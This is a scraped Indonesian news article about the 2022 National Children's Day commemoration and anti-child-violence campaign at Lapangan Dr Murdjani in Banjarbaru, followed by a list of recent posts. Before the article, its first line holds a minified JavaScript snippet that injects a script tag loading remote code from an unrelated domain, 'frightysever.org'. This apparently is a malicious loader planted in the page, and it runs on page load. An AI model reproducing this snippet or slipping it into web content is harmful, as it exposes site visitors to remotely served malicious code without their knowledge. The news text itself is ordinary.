(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

Kampanye Anti Kekerasan Anak di Lapangan Dr Murdjani


KANALKALIMANTAN.COM, BANJARBARU – Peringatan Hari Anak Nasional (HAN) tahun 2022 Provinsi Kalimantan Selatan digelar di lapangan Dr Murdjani Banjarbaru, Minggu (31/7/2022) pagi.

Peringatan HAN 2022 sekaligus kampanye anti kekerasan terhadap anak, dengan mengangkat tema ‘Anak Terlindungi, Indonesia Maju’ yang dicanangkan sejak tahun 2020.

Peringatan Hari Anak Nasional ini setelah selama kurun waktu 2 tahun ditiadakan akibat pandemi Covid-19. Efek dari pandemi tersebut tidak hanya dirasakan oleh para orangtua, namun anak-anak turut terdampak, aktifitas bermain dan bersekolah sangat dibatasi.

Dengan terselenggaranya peringatan tahun ini, mampu meningkatkan kesadaran para orangtua akan pentingnya kesehatan anak, serta masyarakat lebih peduli dengan kondisi anak-anak di sekitar lingkungan tempat tinggal.

 

Baca juga  : Dukungan ke Gus Muhaimin dari Kalteng, Relawan Nonbar Sendratari Ngabe Anom Soekah

Wali Kota Banjarbaru Aditya Mufti Ariffin mengucapkan rasa syukur telah terselenggaranya peringatan Hari Anak Nasional 2022 Provinsi Kalimantan Selatan di Kota Banjarbaru.

“Kita berharap dengan diperingatinya Hari Anak Nasional tahun 2022 ini, anak-anak semakin terjamin untuk masa depannya. Dan kita bisa memberikan perlindungan dan pengayoman kepada hak-hak anak,” katanya.

Berbagai rangkaian kegiatan di setiap daerah mampu memberikan kebahagian dan semangat tersendiri bagi anak-anak di daerah.

“Kita selalu memberikan perhatian pada kewajiban orangtua terhadap anak agar masa depan anak ini terjamin, agar tumbuh kembang anak juga bisa terus diberikan yang terbaik,” ujarnya.

 

Baca juga  : Muhammad Rifky Maulana Dilantik Ketua HIPMI Banjar 2022-2025

Sudah sewajarnya para orangtua dan masyarakat agar anak-anak harus didukung, diberikan semangat dan motivasi. Untuk bangkit kembali dari dampak pandemi yang berkeinginan agar maju meraih cita-cita meraka.

Peringatan Hari Anak Nasioanl (HAN) 2022 dan kampanye anti kekerasan terhadap anak merupakan gagasan dari Kementerian Pemberdayaan dan Perlingungan Anak. (Kanalkalimantan.com/al)

Reporter : al
Editor : kk


Desy Arfianty

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

3 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

5 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

5 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

6 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

10 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

13 jam ago

This website uses cookies.